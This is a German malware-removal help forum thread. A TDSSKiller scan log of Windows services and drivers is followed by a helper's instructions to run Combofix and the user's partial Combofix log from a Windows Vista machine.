18:05:03.0973 5600 [ C70D69A918B178D3C3B06339B40C2E1B ] Serial C:\Windows\system32\drivers\serial.sys
18:05:04.0023 5600 Serial - ok
18:05:04.0053 5600 [ 8AF3D28A879BF75DB53A0EE7A4289624 ] sermouse C:\Windows\system32\drivers\sermouse.sys
18:05:04.0073 5600 sermouse - ok
18:05:04.0103 5600 [ D2193326F729B163125610DBF3E17D57 ] SessionEnv C:\Windows\system32\sessenv.dll
18:05:04.0133 5600 SessionEnv - ok
18:05:04.0153 5600 [ 103B79418DA647736EE95645F305F68A ] sffdisk C:\Windows\system32\drivers\sffdisk.sys
18:05:04.0193 5600 sffdisk - ok
18:05:04.0213 5600 [ 8FD08A310645FE872EEEC6E08C6BF3EE ] sffp_mmc C:\Windows\system32\drivers\sffp_mmc.sys
18:05:04.0263 5600 sffp_mmc - ok
18:05:04.0293 5600 [ 9CFA05FCFCB7124E69CFC812B72F9614 ] sffp_sd C:\Windows\system32\drivers\sffp_sd.sys
18:05:04.0343 5600 sffp_sd - ok
18:05:04.0353 5600 [ 46ED8E91793B2E6F848015445A0AC188 ] sfloppy C:\Windows\system32\drivers\sfloppy.sys
18:05:04.0393 5600 sfloppy - ok
18:05:04.0413 5600 [ E1499BD0FF76B1B2FBBF1AF339D91165 ] SharedAccess C:\Windows\System32\ipnathlp.dll
18:05:04.0443 5600 SharedAccess - ok
18:05:04.0473 5600 [ C7230FBEE14437716701C15BE02C27B8 ] ShellHWDetection C:\Windows\System32\shsvcs.dll
18:05:04.0513 5600 ShellHWDetection - ok
18:05:04.0543 5600 [ D2A595D6EEBEEAF4334F8E50EFBC9931 ] sisagp C:\Windows\system32\drivers\sisagp.sys
18:05:04.0553 5600 sisagp - ok
18:05:04.0563 5600 [ CEDD6F4E7D84E9F98B34B3FE988373AA ] SiSRaid2 C:\Windows\system32\drivers\sisraid2.sys
18:05:04.0573 5600 SiSRaid2 - ok
18:05:04.0593 5600 [ DF843C528C4F69D12CE41CE462E973A7 ] SiSRaid4 C:\Windows\system32\drivers\sisraid4.sys
18:05:04.0603 5600 SiSRaid4 - ok
18:05:04.0713 5600 [ 862BB4CBC05D80C5B45BE430E5EF872F ] slsvc C:\Windows\system32\SLsvc.exe
18:05:05.0003 5600 slsvc - ok
18:05:05.0033 5600 [ 6EDC422215CD78AA8A9CDE6B30ABBD35 ] SLUINotify C:\Windows\system32\SLUINotify.dll
18:05:05.0053 5600 SLUINotify - ok
18:05:05.0083 5600 [ 7B75299A4D201D6A6533603D6914AB04 ] Smb C:\Windows\system32\DRIVERS\smb.sys
18:05:05.0113 5600 Smb - ok
18:05:05.0153 5600 [ 2A146A055B4401C16EE62D18B8E2A032 ] SNMPTRAP C:\Windows\System32\snmptrap.exe
18:05:05.0173 5600 SNMPTRAP - ok
18:05:05.0243 5600 [ 50660E6B082A7BF86751A003C3BB5210 ] SNP2UVC C:\Windows\system32\DRIVERS\snp2uvc.sys
18:05:05.0333 5600 SNP2UVC - ok
18:05:05.0363 5600 [ 7AEBDEEF071FE28B0EEF2CDD69102BFF ] spldr C:\Windows\system32\drivers\spldr.sys
18:05:05.0383 5600 spldr - ok
18:05:05.0403 5600 [ 8554097E5136C3BF9F69FE578A1B35F4 ] Spooler C:\Windows\System32\spoolsv.exe
18:05:05.0443 5600 Spooler - ok
18:05:05.0473 5600 [ 41987F9FC0E61ADF54F581E15029AD91 ] srv C:\Windows\system32\DRIVERS\srv.sys
18:05:05.0503 5600 srv - ok
18:05:05.0523 5600 [ FF33AFF99564B1AA534F58868CBE41EF ] srv2 C:\Windows\system32\DRIVERS\srv2.sys
18:05:05.0553 5600 srv2 - ok
18:05:05.0563 5600 [ 7605C0E1D01A08F3ECD743F38B834A44 ] srvnet C:\Windows\system32\DRIVERS\srvnet.sys
18:05:05.0583 5600 srvnet - ok
18:05:05.0613 5600 [ 03D50B37234967433A5EA5BA72BC0B62 ] SSDPSRV C:\Windows\System32\ssdpsrv.dll
18:05:05.0643 5600 SSDPSRV - ok
18:05:05.0673 5600 [ A36EE93698802CD899F98BFD553D8185 ] ssmdrv C:\Windows\system32\DRIVERS\ssmdrv.sys
18:05:05.0683 5600 ssmdrv - ok
18:05:05.0703 5600 [ 6F1A32E7B7B30F004D9A20AFADB14944 ] SstpSvc C:\Windows\system32\sstpsvc.dll
18:05:05.0723 5600 SstpSvc - ok
18:05:05.0763 5600 [ 5DE7D67E49B88F5F07F3E53C4B92A352 ] stisvc C:\Windows\System32\wiaservc.dll
18:05:05.0823 5600 stisvc - ok
18:05:05.0853 5600 [ 7BA58ECF0C0A9A69D44B3DCA62BECF56 ] swenum C:\Windows\system32\DRIVERS\swenum.sys
18:05:05.0863 5600 swenum - ok
18:05:05.0903 5600 [ F21FD248040681CCA1FB6C9A03AAA93D ] swprv C:\Windows\System32\swprv.dll
18:05:05.0933 5600 swprv - ok
18:05:05.0963 5600 [ 192AA3AC01DF071B541094F251DEED10 ] Symc8xx C:\Windows\system32\drivers\symc8xx.sys
18:05:05.0973 5600 Symc8xx - ok
18:05:06.0003 5600 [ 8C8EB8C76736EBAF3B13B633B2E64125 ] Sym_hi C:\Windows\system32\drivers\sym_hi.sys
18:05:06.0013 5600 Sym_hi - ok
18:05:06.0033 5600 [ 8072AF52B5FD103BBBA387A1E49F62CB ] Sym_u3 C:\Windows\system32\drivers\sym_u3.sys
18:05:06.0044 5600 Sym_u3 - ok
18:05:06.0093 5600 [ 0E8676FB3BB95AA40FDF7A4A31018C8B ] SynTP C:\Windows\system32\DRIVERS\SynTP.sys
18:05:06.0158 5600 SynTP - ok
18:05:06.0217 5600 [ 9A51B04E9886AA4EE90093586B0BA88D ] SysMain C:\Windows\system32\sysmain.dll
18:05:06.0256 5600 SysMain - ok
18:05:06.0279 5600 [ 2DCA225EAE15F42C0933E998EE0231C3 ] TabletInputService C:\Windows\System32\TabSvc.dll
18:05:06.0298 5600 TabletInputService - ok
18:05:06.0324 5600 [ FD90A16CEB10D4FDAA00AAF39B8FF58F ] taphss C:\Windows\system32\DRIVERS\taphss.sys
18:05:06.0336 5600 taphss - ok
18:05:06.0372 5600 [ D7673E4B38CE21EE54C59EEEB65E2483 ] TapiSrv C:\Windows\System32\tapisrv.dll
18:05:06.0401 5600 TapiSrv - ok
18:05:06.0436 5600 [ CB05822CD9CC6C688168E113C603DBE7 ] TBS C:\Windows\System32\tbssvc.dll
18:05:06.0466 5600 TBS - ok
18:05:06.0526 5600 [ 74E2D020C47BB2B2FCCBA29A518A7EB4 ] Tcpip C:\Windows\system32\drivers\tcpip.sys
18:05:06.0561 5600 Tcpip - ok
18:05:06.0579 5600 [ 74E2D020C47BB2B2FCCBA29A518A7EB4 ] Tcpip6 C:\Windows\system32\DRIVERS\tcpip.sys
18:05:06.0660 5600 Tcpip6 - ok
18:05:06.0690 5600 [ 608C345A255D82A6289C2D468EB41FD7 ] tcpipreg C:\Windows\system32\drivers\tcpipreg.sys
18:05:06.0716 5600 tcpipreg - ok
18:05:06.0743 5600 [ 5DCF5E267BE67A1AE926F2DF77FBCC56 ] TDPIPE C:\Windows\system32\drivers\tdpipe.sys
18:05:06.0769 5600 TDPIPE - ok
18:05:06.0829 5600 [ 389C63E32B3CEFED425B61ED92D3F021 ] TDTCP C:\Windows\system32\drivers\tdtcp.sys
18:05:06.0855 5600 TDTCP - ok
18:05:06.0893 5600 [ 76B06EB8A01FC8624D699E7045303E54 ] tdx C:\Windows\system32\DRIVERS\tdx.sys
18:05:06.0915 5600 tdx - ok
18:05:07.0127 5600 [ 9F3E7CABE86BBDECA009DE291DB6D9E2 ] TeamViewer8 C:\Program Files\TeamViewer\Version8\TeamViewer_Service.exe
18:05:07.0811 5600 TeamViewer8 - ok
18:05:07.0857 5600 [ 3CAD38910468EAB9A6479E2F01DB43C7 ] TermDD C:\Windows\system32\DRIVERS\termdd.sys
18:05:07.0873 5600 TermDD - ok
18:05:07.0904 5600 [ BB95DA09BEF6E7A131BFF3BA5032090D ] TermService C:\Windows\System32\termsrv.dll
18:05:07.0935 5600 TermService - ok
18:05:07.0951 5600 [ C7230FBEE14437716701C15BE02C27B8 ] Themes C:\Windows\system32\shsvcs.dll
18:05:07.0982 5600 Themes - ok
18:05:07.0998 5600 [ 1076FFCFFAAE8385FD62DFCB25AC4708 ] THREADORDER C:\Windows\system32\mmcss.dll
18:05:08.0018 5600 THREADORDER - ok
18:05:08.0038 5600 [ EC74E77D0EB004BD3A809B5F8FB8C2CE ] TrkWks C:\Windows\System32\trkwks.dll
18:05:08.0068 5600 TrkWks - ok
18:05:08.0098 5600 [ 97D9D6A04E3AD9B6C626B9931DB78DBA ] TrustedInstaller C:\Windows\servicing\TrustedInstaller.exe
18:05:08.0118 5600 TrustedInstaller - ok
18:05:08.0148 5600 [ DCF0F056A2E4F52287264F5AB29CF206 ] tssecsrv C:\Windows\system32\DRIVERS\tssecsrv.sys
18:05:08.0178 5600 tssecsrv - ok
18:05:08.0198 5600 [ CAECC0120AC49E3D2F758B9169872D38 ] tunmp C:\Windows\system32\DRIVERS\tunmp.sys
18:05:08.0228 5600 tunmp - ok
18:05:08.0238 5600 [ 300DB877AC094FEAB0BE7688C3454A9C ] tunnel C:\Windows\system32\DRIVERS\tunnel.sys
18:05:08.0258 5600 tunnel - ok
18:05:08.0288 5600 [ C3ADE15414120033A36C0F293D4A4121 ] uagp35 C:\Windows\system32\drivers\uagp35.sys
18:05:08.0298 5600 uagp35 - ok
18:05:08.0328 5600 [ D9728AF68C4C7693CB100B8441CBDEC6 ] udfs C:\Windows\system32\DRIVERS\udfs.sys
18:05:08.0358 5600 udfs - ok
18:05:08.0388 5600 [ ECEF404F62863755951E09C802C94AD5 ] UI0Detect C:\Windows\system32\UI0Detect.exe
18:05:08.0418 5600 UI0Detect - ok
18:05:08.0428 5600 [ 75E6890EBFCE0841D3291B02E7A8BDB0 ] uliagpkx C:\Windows\system32\drivers\uliagpkx.sys
18:05:08.0448 5600 uliagpkx - ok
18:05:08.0468 5600 [ 3CD4EA35A6221B85DCC25DAA46313F8D ] uliahci C:\Windows\system32\drivers\uliahci.sys
18:05:08.0488 5600 uliahci - ok
18:05:08.0498 5600 [ 8514D0E5CD0534467C5FC61BE94A569F ] UlSata C:\Windows\system32\drivers\ulsata.sys
18:05:08.0508 5600 UlSata - ok
18:05:08.0528 5600 [ 38C3C6E62B157A6BC46594FADA45C62B ] ulsata2 C:\Windows\system32\drivers\ulsata2.sys
18:05:08.0538 5600 ulsata2 - ok
18:05:08.0568 5600 [ 32CFF9F809AE9AED85464492BF3E32D2 ] umbus C:\Windows\system32\DRIVERS\umbus.sys
18:05:08.0588 5600 umbus - ok
18:05:08.0618 5600 [ 68308183F4AE0BE7BF8ECD07CB297999 ] upnphost C:\Windows\System32\upnphost.dll
18:05:08.0658 5600 upnphost - ok
18:05:08.0678 5600 [ EAFE1E00739AFE6C51487A050E772E17 ] USBAAPL C:\Windows\system32\Drivers\usbaapl.sys
18:05:08.0698 5600 USBAAPL - ok
18:05:08.0748 5600 [ CAF811AE4C147FFCD5B51750C7F09142 ] usbccgp C:\Windows\system32\DRIVERS\usbccgp.sys
18:05:08.0768 5600 usbccgp - ok
18:05:08.0808 5600 [ E9476E6C486E76BC4898074768FB7131 ] usbcir C:\Windows\system32\drivers\usbcir.sys
18:05:08.0858 5600 usbcir - ok
18:05:08.0868 5600 [ 79E96C23A97CE7B8F14D310DA2DB0C9B ] usbehci C:\Windows\system32\DRIVERS\usbehci.sys
18:05:08.0888 5600 usbehci - ok
18:05:08.0918 5600 [ 4673BBCB006AF60E7ABDDBE7A130BA42 ] usbhub C:\Windows\system32\DRIVERS\usbhub.sys
18:05:08.0938 5600 usbhub - ok
18:05:08.0968 5600 [ 38DBC7DD6CC5A72011F187425384388B ] usbohci C:\Windows\system32\drivers\usbohci.sys
18:05:09.0008 5600 usbohci - ok
18:05:09.0038 5600 [ E75C4B5269091D15A2E7DC0B6D35F2F5 ] usbprint C:\Windows\system32\DRIVERS\usbprint.sys
18:05:09.0068 5600 usbprint - ok
18:05:09.0083 5600 [ A508C9BD8724980512136B039BBA65E9 ] usbscan C:\Windows\system32\DRIVERS\usbscan.sys
18:05:09.0102 5600 usbscan - ok
18:05:09.0125 5600 [ BE3DA31C191BC222D9AD503C5224F2AD ] USBSTOR C:\Windows\system32\DRIVERS\USBSTOR.SYS
18:05:09.0146 5600 USBSTOR - ok
18:05:09.0174 5600 [ 814D653EFC4D48BE3B04A307ECEFF56F ] usbuhci C:\Windows\system32\DRIVERS\usbuhci.sys
18:05:09.0195 5600 usbuhci - ok
18:05:09.0222 5600 [ E67998E8F14CB0627A769F6530BCB352 ] usbvideo C:\Windows\system32\Drivers\usbvideo.sys
18:05:09.0248 5600 usbvideo - ok
18:05:09.0273 5600 [ 1509E705F3AC1D474C92454A5C2DD81F ] UxSms C:\Windows\System32\uxsms.dll
18:05:09.0296 5600 UxSms - ok
18:05:09.0335 5600 [ CD88D1B7776DC17A119049742EC07EB4 ] vds C:\Windows\System32\vds.exe
18:05:09.0365 5600 vds - ok
18:05:09.0396 5600 [ 7D92BE0028ECDEDEC74617009084B5EF ] vga C:\Windows\system32\DRIVERS\vgapnp.sys
18:05:09.0443 5600 vga - ok
18:05:09.0468 5600 [ 2E93AC0A1D8C79D019DB6C51F036636C ] VgaSave C:\Windows\System32\drivers\vga.sys
18:05:09.0496 5600 VgaSave - ok
18:05:09.0507 5600 [ 045D9961E591CF0674A920B6BA3BA5CB ] viaagp C:\Windows\system32\drivers\viaagp.sys
18:05:09.0521 5600 viaagp - ok
18:05:09.0533 5600 [ 56A4DE5F02F2E88182B0981119B4DD98 ] ViaC7 C:\Windows\system32\drivers\viac7.sys
18:05:09.0579 5600 ViaC7 - ok
18:05:09.0600 5600 [ FD2E3175FCADA350C7AB4521DCA187EC ] viaide C:\Windows\system32\drivers\viaide.sys
18:05:09.0614 5600 viaide - ok
18:05:09.0635 5600 [ 69503668AC66C77C6CD7AF86FBDF8C43 ] volmgr C:\Windows\system32\drivers\volmgr.sys
18:05:09.0648 5600 volmgr - ok
18:05:09.0679 5600 [ 23E41B834759917BFD6B9A0D625D0C28 ] volmgrx C:\Windows\system32\drivers\volmgrx.sys
18:05:09.0697 5600 volmgrx - ok
18:05:09.0732 5600 [ 786DB5771F05EF300390399F626BF30A ] volsnap C:\Windows\system32\drivers\volsnap.sys
18:05:09.0751 5600 volsnap - ok
18:05:09.0777 5600 [ D984439746D42B30FC65A4C3546C6829 ] vsmraid C:\Windows\system32\drivers\vsmraid.sys
18:05:09.0790 5600 vsmraid - ok
18:05:09.0843 5600 [ DB3D19F850C6EB32BDCB9BC0836ACDDB ] VSS C:\Windows\system32\vssvc.exe
18:05:09.0886 5600 VSS - ok
18:05:09.0943 5600 [ 96EA68B9EB310A69C25EBB0282B2B9DE ] W32Time C:\Windows\system32\w32time.dll
18:05:09.0974 5600 W32Time - ok
18:05:09.0993 5600 [ 48DFEE8F1AF7C8235D4E626F0C4FE031 ] WacomPen C:\Windows\system32\drivers\wacompen.sys
18:05:10.0057 5600 WacomPen - ok
18:05:10.0088 5600 [ 55201897378CCA7AF8B5EFD874374A26 ] Wanarp C:\Windows\system32\DRIVERS\wanarp.sys
18:05:10.0089 5600 Wanarp - ok
18:05:10.0120 5600 [ 55201897378CCA7AF8B5EFD874374A26 ] Wanarpv6 C:\Windows\system32\DRIVERS\wanarp.sys
18:05:10.0136 5600 Wanarpv6 - ok
18:05:10.0167 5600 [ A3CD60FD826381B49F03832590E069AF ] wcncsvc C:\Windows\System32\wcncsvc.dll
18:05:10.0198 5600 wcncsvc - ok
18:05:10.0230 5600 [ 11BCB7AFCDD7AADACB5746F544D3A9C7 ] WcsPlugInService C:\Windows\System32\WcsPlugInService.dll
18:05:10.0245 5600 WcsPlugInService - ok
18:05:10.0292 5600 [ AFC5AD65B991C1E205CF25CFDBF7A6F4 ] Wd C:\Windows\system32\drivers\wd.sys
18:05:10.0292 5600 Wd - ok
18:05:10.0339 5600 [ A840213F1ACDCC175B4D1D5AAEAC0D7A ] Wdf01000 C:\Windows\system32\drivers\Wdf01000.sys
18:05:10.0370 5600 Wdf01000 - ok
18:05:10.0401 5600 [ ABFC76B48BB6C96E3338D8943C5D93B5 ] WdiServiceHost C:\Windows\system32\wdi.dll
18:05:10.0432 5600 WdiServiceHost - ok
18:05:10.0432 5600 [ ABFC76B48BB6C96E3338D8943C5D93B5 ] WdiSystemHost C:\Windows\system32\wdi.dll
18:05:10.0464 5600 WdiSystemHost - ok
18:05:10.0495 5600 [ 04C37D8107320312FBAE09926103D5E2 ] WebClient C:\Windows\System32\webclnt.dll
18:05:10.0505 5600 WebClient - ok
18:05:10.0525 5600 [ AE3736E7E8892241C23E4EBBB7453B60 ] Wecsvc C:\Windows\system32\wecsvc.dll
18:05:10.0555 5600 Wecsvc - ok
18:05:10.0585 5600 [ 670FF720071ED741206D69BD995EA453 ] wercplsupport C:\Windows\System32\wercplsupport.dll
18:05:10.0605 5600 wercplsupport - ok
18:05:10.0635 5600 [ 32B88481D3B326DA6DEB07B1D03481E7 ] WerSvc C:\Windows\System32\WerSvc.dll
18:05:10.0665 5600 WerSvc - ok
18:05:10.0705 5600 [ 4575AA12561C5648483403541D0D7F2B ] WinDefend C:\Program Files\Windows Defender\mpsvc.dll
18:05:10.0725 5600 WinDefend - ok
18:05:10.0735 5600 WinHttpAutoProxySvc - ok
18:05:10.0785 5600 [ 6B2A1D0E80110E3D04E6863C6E62FD8A ] Winmgmt C:\Windows\system32\wbem\WMIsvc.dll
18:05:10.0815 5600 Winmgmt - ok
18:05:10.0865 5600 [ 7CFE68BDC065E55AA5E8421607037511 ] WinRM C:\Windows\system32\WsmSvc.dll
18:05:10.0925 5600 WinRM - ok
18:05:10.0985 5600 [ C008405E4FEEB069E30DA1D823910234 ] Wlansvc C:\Windows\System32\wlansvc.dll
18:05:11.0015 5600 Wlansvc - ok
18:05:11.0045 5600 [ 2E7255D172DF0B8283CDFB7B433B864E ] WmiAcpi C:\Windows\system32\DRIVERS\wmiacpi.sys
18:05:11.0065 5600 WmiAcpi - ok
18:05:11.0105 5600 [ 43BE3875207DCB62A85C8C49970B66CC ] wmiApSrv C:\Windows\system32\wbem\WmiApSrv.exe
18:05:11.0125 5600 wmiApSrv - ok
18:05:11.0185 5600 [ 3978704576A121A9204F8CC49A301A9B ] WMPNetworkSvc C:\Program Files\Windows Media Player\wmpnetwk.exe
18:05:11.0225 5600 WMPNetworkSvc - ok
18:05:11.0275 5600 [ CFC5A04558F5070CEE3E3A7809F3FF52 ] WPCSvc C:\Windows\System32\wpcsvc.dll
18:05:11.0295 5600 WPCSvc - ok
18:05:11.0315 5600 [ 801FBDB89D472B3C467EB112A0FC9246 ] WPDBusEnum C:\Windows\system32\wpdbusenum.dll
18:05:11.0345 5600 WPDBusEnum - ok
18:05:11.0375 5600 [ DE9D36F91A4DF3D911626643DEBF11EA ] WpdUsb C:\Windows\system32\DRIVERS\wpdusb.sys
18:05:11.0385 5600 WpdUsb - ok
18:05:11.0465 5600 [ DCF3E3EDF5109EE8BC02FE6E1F045795 ] WPFFontCache_v0400 C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\WPFFontCache_v0400.exe
18:05:11.0495 5600 WPFFontCache_v0400 - ok
18:05:11.0505 5600 [ E3A3CB253C0EC2494D4A61F5E43A389C ] ws2ifsl C:\Windows\system32\drivers\ws2ifsl.sys
18:05:11.0535 5600 ws2ifsl - ok
18:05:11.0565 5600 [ 1CA6C40261DDC0425987980D0CD2AAAB ] wscsvc C:\Windows\System32\wscsvc.dll
18:05:11.0585 5600 wscsvc - ok
18:05:11.0595 5600 WSearch - ok
18:05:11.0655 5600 [ FC3EC24FCE372C89423E015A2AC1A31E ] wuauserv C:\Windows\system32\wuaueng.dll
18:05:11.0785 5600 wuauserv - ok
18:05:11.0815 5600 [ 06E6F32C8D0A3F66D956F57B43A2E070 ] WudfPf C:\Windows\system32\drivers\WudfPf.sys
18:05:11.0835 5600 WudfPf - ok
18:05:11.0855 5600 [ 867C301E8B790040AE9CF6486E8041DF ] WUDFRd C:\Windows\system32\DRIVERS\WUDFRd.sys
18:05:11.0865 5600 WUDFRd - ok
18:05:11.0905 5600 [ FE47B7BC8EA320C2D9B5E5BF6E303765 ] wudfsvc C:\Windows\System32\WUDFSvc.dll
18:05:11.0925 5600 wudfsvc - ok
18:05:11.0955 5600 [ C6CA0CC2F7FCDCFE5B551335BFE6D696 ] yukonwlh C:\Windows\system32\DRIVERS\yk60x86.sys
18:05:11.0995 5600 yukonwlh - ok
18:05:12.0005 5600 ================ Scan global ===============================
18:05:12.0035 5600 [ F31EEBC1A1C81FD04005489CC3DCDFE7 ] C:\Windows\system32\basesrv.dll
18:05:12.0055 5600 [ D2293B069E4B63DC17B2F08D45E71124 ] C:\Windows\system32\winsrv.dll
18:05:12.0075 5600 [ D2293B069E4B63DC17B2F08D45E71124 ] C:\Windows\system32\winsrv.dll
18:05:12.0096 5600 [ D4E6D91C1349B7BFB3599A6ADA56851B ] C:\Windows\system32\services.exe
18:05:12.0100 5600 [Global] - ok
18:05:12.0102 5600 ================ Scan MBR ==================================
18:05:12.0115 5600 [ 5C616939100B85E558DA92B899A0FC36 ] \Device\Harddisk0\DR0
18:05:12.0731 5600 \Device\Harddisk0\DR0 - ok
18:05:12.0735 5600 [ 5FB38429D5D77768867C76DCBDB35194 ] \Device\Harddisk1\DR1
18:05:12.0856 5600 \Device\Harddisk1\DR1 - ok
18:05:12.0867 5600 [ 8F558EB6672622401DA993E1E865C861 ] \Device\Harddisk2\DR2
18:05:12.0982 5600 \Device\Harddisk2\DR2 - ok
18:05:12.0985 5600 ================ Scan VBR ==================================
18:05:12.0986 5600 [ 961EA6BC3F5CD34DA67B2EEE8AA84D1B ] \Device\Harddisk0\DR0\Partition1
18:05:12.0989 5600 \Device\Harddisk0\DR0\Partition1 - ok
18:05:13.0018 5600 [ 758AD88425527B05E4FA98631C162C08 ] \Device\Harddisk0\DR0\Partition2
18:05:13.0019 5600 \Device\Harddisk0\DR0\Partition2 - ok
18:05:13.0032 5600 [ EFF1ECE495ECBDEA78E34410A05FC2D3 ] \Device\Harddisk0\DR0\Partition3
18:05:13.0033 5600 \Device\Harddisk0\DR0\Partition3 - ok
18:05:13.0039 5600 [ D894F5CF2FC97000C4CD292863AEACC0 ] \Device\Harddisk1\DR1\Partition1
18:05:13.0040 5600 \Device\Harddisk1\DR1\Partition1 - ok
18:05:13.0047 5600 [ B40BC0A08101F64916E605AE52C91653 ] \Device\Harddisk2\DR2\Partition1
18:05:13.0050 5600 \Device\Harddisk2\DR2\Partition1 - ok
18:05:13.0051 5600 ============================================================
18:05:13.0051 5600 Scan finished
18:05:13.0051 5600 ============================================================
18:05:13.0062 5928 Detected object count: 0
18:05:13.0062 5928 Actual detected object count: 0

markusg · 19.02.2013, 18:07

Sehr gut.
Scan mit Combofix

WARNUNG an die MITLESER:
Combofix sollte ausschließlich ausgeführt werden, wenn dies von einem Teammitglied angewiesen wurde!

Downloade dir bitte Combofix vom folgenden Downloadspiegel: Link

WICHTIG: Speichere Combofix auf deinem Desktop.

Deaktiviere bitte alle deine Antivirensoftware sowie Malware/Spyware Scanner. Diese können Combofix bei der Arbeit stören. Combofix meckert auch manchmal trotzdem noch, das kannst du dann ignorieren, mir aber bitte mitteilen.

Starte die Combofix.exe und folge den Anweisungen auf dem Bildschirm.

Während Combofix läuft bitte nicht am Computer arbeiten, die Maus bewegen oder ins Combofixfenster klicken!

Wenn Combofix fertig ist, wird es ein Logfile erstellen.

Bitte poste die C:\Combofix.txt in deiner nächsten Antwort (möglichst in CODE-Tags).

Hinweis: Solltest du nach dem Neustart folgende Fehlermeldung erhalten
Es wurde versucht, einen Registrierungsschlüssel einem ungültigen Vorgang zu unterziehen, der zum Löschen markiert wurde.
starte den Rechner einfach neu. Dies sollte das Problem beheben.

martinbu · 19.02.2013, 18:41

Das hat glaube ich leider nicht so geklappt wie es sollte. Das Programm zeigt mir für etwa eine Minute an, dass gescannt wird. Anschließend erhalte ich diesen Bluescreen: hxxp://www.fotos-hochladen.net/uploads/fr52size1024oy5w3knrm2.jpg

Der Computer wird danach neu gestartet, folgende Fehlermeldung erscheint: hxxp://www.fotos-hochladen.net/uploads/fr53size1024aftzce0bx5.jpg

markusg · 19.02.2013, 18:59

starte neu, drücke f8 wähle abgesicherter Modus. melde dich in deinem Konto an.
starte combofix erneut, speichere das log und gehe in den normalen modus. dann poste es

martinbu · 19.02.2013, 19:39

Das hat nun ohne Probleme funktioniert. Hier ist die Log-Datei:

Combofix Logfile:

Code:

ATTFilter

ComboFix 13-02-18.02 - TuS 19.02.2013  19:23:12.1.2 - x86 NETWORK
Microsoft® Windows Vista™ Home Basic   6.0.6002.2.1252.49.1031.18.1976.1552 [GMT 1:00]
ausgeführt von:: c:\users\TuS\Desktop\ComboFix.exe
AV: Avira Desktop *Enabled/Updated* {F67B4DE5-C0B4-6C3F-0EFF-6C83BD5D0C2C}
SP: Avira Desktop *Enabled/Updated* {4D1AAC01-E68E-63B1-344F-57F1C6DA4691}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
((((((((((((((((((((((((((((((((((((   Weitere Löschungen   ))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\programdata\ntuser.dat
c:\windows\unin0407.exe
G:\Autorun.inf
.
.
(((((((((((((((((((((((   Dateien erstellt von 2013-01-19 bis 2013-02-19  ))))))))))))))))))))))))))))))
.
.
2013-02-19 18:29 . 2013-02-19 18:29	--------	d-----w-	c:\users\TuS\AppData\Local\temp
2013-02-19 18:29 . 2013-02-19 18:29	--------	d-----w-	c:\users\Default\AppData\Local\temp
2013-02-19 14:17 . 2013-01-08 04:57	6991832	----a-w-	c:\programdata\Microsoft\Windows Defender\Definition Updates\{6D45505C-6106-4259-9FB1-03C54D00EBCA}\mpengine.dll
2013-02-19 09:35 . 2013-02-19 09:35	--------	d-----w-	c:\windows\system32\IO
2013-02-18 21:34 . 2013-02-18 21:57	--------	d-----w-	c:\users\TuS\AppData\Roaming\Notepad++
2013-02-18 21:34 . 2013-02-18 21:35	--------	d-----w-	c:\program files\Notepad++
2013-02-15 08:20 . 2013-01-04 01:38	2048512	----a-w-	c:\windows\system32\win32k.sys
2013-02-15 08:20 . 2012-11-08 03:48	1314816	----a-w-	c:\windows\system32\quartz.dll
2013-02-15 08:20 . 2013-01-04 11:28	905576	----a-w-	c:\windows\system32\drivers\tcpip.sys
2013-02-15 08:20 . 2013-01-05 05:26	3550072	----a-w-	c:\windows\system32\ntoskrnl.exe
2013-02-15 08:20 . 2013-01-05 05:26	3602808	----a-w-	c:\windows\system32\ntkrnlpa.exe
2013-01-29 18:19 . 2013-01-29 18:19	--------	d-----w-	c:\program files\MP3Gain
2013-01-24 20:00 . 2013-01-24 20:00	159744	----a-w-	c:\program files\Internet Explorer\Plugins\npqtplugin7.dll
2013-01-24 20:00 . 2013-01-24 20:00	159744	----a-w-	c:\program files\Internet Explorer\Plugins\npqtplugin6.dll
2013-01-24 20:00 . 2013-01-24 20:00	159744	----a-w-	c:\program files\Internet Explorer\Plugins\npqtplugin5.dll
2013-01-24 20:00 . 2013-01-24 20:00	159744	----a-w-	c:\program files\Internet Explorer\Plugins\npqtplugin4.dll
2013-01-24 20:00 . 2013-01-24 20:00	159744	----a-w-	c:\program files\Internet Explorer\Plugins\npqtplugin3.dll
2013-01-24 20:00 . 2013-01-24 20:00	159744	----a-w-	c:\program files\Internet Explorer\Plugins\npqtplugin2.dll
2013-01-24 20:00 . 2013-01-24 20:00	159744	----a-w-	c:\program files\Internet Explorer\Plugins\npqtplugin.dll
2013-01-24 19:59 . 2013-01-24 20:00	--------	d-----w-	c:\program files\QuickTime
2013-01-24 17:46 . 2013-01-24 17:46	--------	d-----w-	c:\users\TuS\AppData\Roaming\Malwarebytes
2013-01-24 17:45 . 2013-01-24 17:45	--------	d-----w-	c:\programdata\Malwarebytes
.
.
.
((((((((((((((((((((((((((((((((((((   Find3M Bericht   ))))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2013-02-08 15:58 . 2012-06-10 18:25	697712	----a-w-	c:\windows\system32\FlashPlayerApp.exe
2013-02-08 15:58 . 2011-06-09 19:25	74096	----a-w-	c:\windows\system32\FlashPlayerCPLApp.cpl
2013-01-17 00:28 . 2011-02-19 11:29	232336	------w-	c:\windows\system32\MpSigStub.exe
2012-12-22 15:58 . 2012-12-22 15:59	93640	----a-w-	c:\windows\system32\WindowsAccessBridge.dll
2012-12-22 15:58 . 2012-09-03 12:56	859072	----a-w-	c:\windows\system32\npdeployJava1.dll
2012-12-22 15:58 . 2011-06-09 19:13	779704	----a-w-	c:\windows\system32\deployJava1.dll
2012-12-16 13:12 . 2012-12-22 11:13	34304	----a-w-	c:\windows\system32\atmlib.dll
2012-12-16 10:50 . 2012-12-22 11:13	293376	----a-w-	c:\windows\system32\atmfd.dll
2013-02-08 15:40 . 2013-02-08 15:39	262552	----a-w-	c:\program files\mozilla firefox\components\browsercomps.dll
.
.
((((((((((((((((((((((((((((   Autostartpunkte der Registrierung   ))))))))))))))))))))))))))))))))))))))))
.
.
*Hinweis* leere Einträge & legitime Standardeinträge werden nicht angezeigt. 
REGEDIT4
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"RocketDock"="c:\program files\RocketDock\RocketDock.exe" [2007-09-02 495616]
"WMPNSCFG"="c:\program files\Windows Media Player\WMPNSCFG.exe" [2008-01-19 202240]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
